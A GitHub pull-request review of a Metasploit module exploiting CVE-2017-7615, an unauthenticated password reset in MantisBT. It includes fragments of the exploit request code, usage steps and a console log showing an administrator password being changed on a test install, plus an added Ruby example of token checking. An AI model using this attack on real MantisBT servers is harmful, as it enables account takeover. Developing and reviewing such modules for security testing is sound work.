Add a module for CVE-2017-7615 #8671

Merged (9 commits), Jul 12, 2017
Conversation

jvoisin (Contributor) commented Jul 9, 2017

Add a module for CVE-2017-7615, aka an unauthenticated password reset in MantisBT.

Verification

List the steps needed to make sure this thing works

  • Setup MantisBT (you can get the version 1.3.0 here or from sourceforge)
  • Start msfconsole
  • use auxiliary/admin/http/mantisbt_password_reset
  • set RHOST <target IP>
  • Verify that the module outputs [+] Password successfully changed to …
  • Verify that the password works

4. Do: ```set rhost```
5. Do: ```run```
6. If the system is vulnerable, the module should tell you that the password was successfulyl changed.
Contributor

"successfully"

```ruby
['CVE', '2017-7615'],
['EDB', '41890'],
['URL', 'https://mantisbt.org/bugs/view.php?id=22690']
['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
```
Contributor

Inconsistent indentation

```ruby
],
'Platform' => ['win', 'linux'],
'Privileged' => false,
'DisclosureDate' => "Apr 16, 2017"))
```
Contributor

I don't think `,` is allowed in DisclosureDate.

Make sure you run tools/dev/msftidy.rb

Contributor Author

It isn't raising any warnings here.

```ruby
'vars_post' => {
'verify_user_id' => datastore['USERID'],
'account_update_token' => $1,
'realname' => 'jvoisin',
```
Contributor

Can the realname be randomized? Rex::Text.rand_text_alpha(rand(5) + 8)

Contributor Author

Sure

```ruby
password = datastore['PASSWORD']
end

res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/
```
Contributor

Is this meant to be an if conditional?

Contributor Author

Nope, it's meant to get the token later, with $1.

Contributor

Will MantisBT accept the request if the account_update_token is '' ?

If not, it might be nice to handle this scenario, with something like:

```ruby
if res.body =~ /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/
  token = $1
else
  fail_with(Failure::UnexpectedReply, 'Could not retrieve account_update_token')
end
```

Contributor Author

Sure ♥

```ruby
['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
],
'Platform' => ['win', 'linux'],
'Privileged' => false,
```
Contributor

Privileged can be removed for auxiliary modules.

```ruby
if datastore['PASSWORD'].blank?
password = Rex::Text.rand_text_alpha(8)
else
password = datastore['PASSWORD']
```
Contributor

Does MantisBT make use of a password complexity policy? It might be nice to print_warning if the specified password is too weak to pass the complexity requirements.

Contributor Author

Absolutely not :D

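The two review points above (checking that the `account_update_token` was actually found instead of trusting `$1`, and falling back to a random password when none is configured) as an added, stand-alone example. This is not code from the PR or from Metasploit: `UnexpectedReply`, `extract_account_update_token`, `choose_password` and the sample HTML bodies are hypothetical stand-ins for the module's `fail_with(Failure::UnexpectedReply, ...)` and `Rex::Text.rand_text_alpha` calls; the regex is the one shown in the review.

```ruby
require 'securerandom'

# Regex from the code under review: the token is a non-empty run of URL-safe
# characters, so an attribute value="" never matches.
TOKEN_RE = /<input type="hidden" name="account_update_token" value="([a-zA-Z0-9_-]+)"/

# Checked form the reviewer asked for: return the token, or nil when the page
# carries no usable token, so the caller can decide to abort.
def extract_account_update_token(body)
  m = TOKEN_RE.match(body)
  m && m[1]
end

# Unchecked pattern from the original line: after a failed =~ Ruby resets $~,
# so $1 is nil and a request built from it would silently carry an empty token.
def token_via_unchecked_match(body)
  body =~ TOKEN_RE
  $1
end

# Hypothetical stand-in for Failure::UnexpectedReply / fail_with.
class UnexpectedReply < StandardError; end

def account_update_token!(body)
  extract_account_update_token(body) ||
    raise(UnexpectedReply, 'Could not retrieve account_update_token')
end

# Equivalent of the blank? / rand_text_alpha(8) branch: keep a configured
# password, otherwise draw 8 ASCII letters from a CSPRNG.
ALPHA = (('a'..'z').to_a + ('A'..'Z').to_a).freeze

def choose_password(configured, length = 8)
  return configured unless configured.nil? || configured.strip.empty?
  Array.new(length) { ALPHA[SecureRandom.random_number(ALPHA.size)] }.join
end

# Constructed sample bodies (hypothetical markup, not captured from a MantisBT install).
BODY_WITH_TOKEN = <<~HTML
  <form method="post">
    <input type="hidden" name="account_update_token" value="abc_DEF-123"/>
    <input type="text" name="realname" value=""/>
  </form>
HTML
BODY_EMPTY_TOKEN = '<input type="hidden" name="account_update_token" value=""/>'
BODY_NO_FORM     = '<html><body><p>Please log in.</p></body></html>'

if __FILE__ == $PROGRAM_NAME
  [BODY_WITH_TOKEN, BODY_EMPTY_TOKEN, BODY_NO_FORM].each do |body|
    puts "checked: #{extract_account_update_token(body).inspect}  " \
         "unchecked $1: #{token_via_unchecked_match(body).inspect}"
  end
  begin
    account_update_token!(BODY_NO_FORM)
  rescue UnexpectedReply => e
    puts "fail_with equivalent: #{e.message}"
  end
  puts "password: #{choose_password(nil)}"
end
```

Running the file prints the token for the first body and `nil` for the other two under both extraction styles; the difference is that `account_update_token!` turns the `nil` into an explicit failure before any request is built, which is the behaviour the reviewer suggested.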
bcoles (Contributor) commented Jul 9, 2017

Thanks @jvoisin !

```ruby
[
['CVE', '2017-7615'],
['EDB', '41890'],
['URL', 'https://mantisbt.org/bugs/view.php?id=22690']
```
Contributor

Missing comma `,` at end of line.

pbarry-r7 (Contributor)

Verified, works as advertised for me (and did, indeed, change my Administrator account's password!):

```
$ ./msfconsole -q
msf > use auxiliary/admin/http/mantisbt_password_reset
msf auxiliary(mantisbt_password_reset) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(mantisbt_password_reset) > set TARGETURI mantisbt
TARGETURI => mantisbt
msf auxiliary(mantisbt_password_reset) > run

[+] Password successfully changed to 'KEYooXFe'.
[*] Auxiliary module execution completed
```

I have a few very minor style (and one spelling) tweaks; will commit then land. Thanks, @jvoisin!

@pbarry-r7 pbarry-r7 merged commit 5802196 into rapid7:master Jul 12, 2017
pbarry-r7 added a commit that referenced this pull request Jul 12, 2017
pbarry-r7 (Contributor) commented Jul 12, 2017

Release Notes

The ability to reset the password associated with any user ID for vulnerable versions of MantisBT has been added.

@alrosenthal-r7 alrosenthal-r7 added the rn-enhancement release notes enhancement label Jul 13, 2017